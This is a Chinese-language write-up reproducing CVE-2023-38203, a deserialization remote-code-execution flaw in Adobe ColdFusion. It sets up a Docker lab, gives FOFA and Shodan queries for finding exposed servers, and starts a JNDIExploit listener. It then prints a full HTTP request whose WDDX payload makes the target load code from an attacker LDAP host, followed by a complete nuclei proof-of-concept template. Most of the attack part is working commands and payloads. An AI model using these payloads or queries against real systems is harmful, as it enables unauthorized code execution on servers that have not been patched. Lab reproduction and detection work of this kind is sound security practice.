免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!


漏洞名称

Adobe ColdFusion 反序列化漏洞

漏洞影响

Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)

漏洞描述

AdobeQ ColdFusion是一种服务器端的Web,应用开发平台。它由Adobe Systems开发,用于创建动态的、交互式的Web应用程序和网站。Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)受到反序列化未受信任数据漏洞的影响,可能导致任意代码执行。利用此问题不需要用户交互。

靶场搭建

方便期间使用docker搭建靶场

拉取镜像

docker pull vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

启动容器

docker run -d -P vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

查看容器

docker ps

访问页面:http://192.168.40.130:32773/

靶场搭建完毕

FOFA搜索语句

app="Adobe-ColdFusion"


漏洞复现

先在windows上启动一下JNDIExploit-1.4-SNAPSHOT.jar,工具包在文末获取,命令中的192.168.40.1是我本机IP

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.40.1

然后向靶场发送如下数据包,执行ls命令,其中ldap://192.168.40.1:1389/Basic/TomcatEcho中的ip端口是我们启动监听的IP和端口/Basic/TomcatEcho表示TomcatEcho回显链

POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: 192.168.40.130:32773
Content-Type: application/x-www-form-urlencoded
Content-Length: 289
cmd: ls

argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>ldap://192.168.40.1:1389/Basic/TomcatEcho</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>

漏洞复现成功

nuclei poc

poc文件内容如下

id: CVE-2023-38203

info:
  name: Adobe ColdFusion Deserialization of Untrusted Data
  author: yiran
  severity: critical
  description: |
    Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade to Adobe ColdFusion version ColdFusion 2018 Update 18, ColdFusion 2021 Update 8, ColdFusion 2023 Update2 or later to mitigate this vulnerability.
  reference:
    - https://blog.projectdiscovery.io/adobe-coldfusion-rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38203
    - https://github.com/Ostorlab/KEV
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-38203
    cwe-id: CWE-502
    epss-score: 0.517
    epss-percentile: 0.97465
    cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: adobe
    product: coldfusion
    shodan-query: http.component:"Adobe ColdFusion"
    fofa-query: app="Adobe-ColdFusion"
  tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev

variables:
  callback: "{{interactsh-url}}"
  jndi: "ldap%3a//{{callback}}/zdfzfd"

http:
  - raw:
      - |
        POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, "dns")
          - contains(body, "ColdFusion documentation")
        condition: and
# digest: 4b0a00483046022100f6280931eee930b47cdc03d8c30ba67d06c87b834c6e0bb84178023c691233d40221008ad4dde32f3b56f4537ce1fe8adf2bc0e5914ac40ce1837539b8faf698227a7d:922c64590222798bb761d5b6d8e72950

修复建议

升级到最新版本。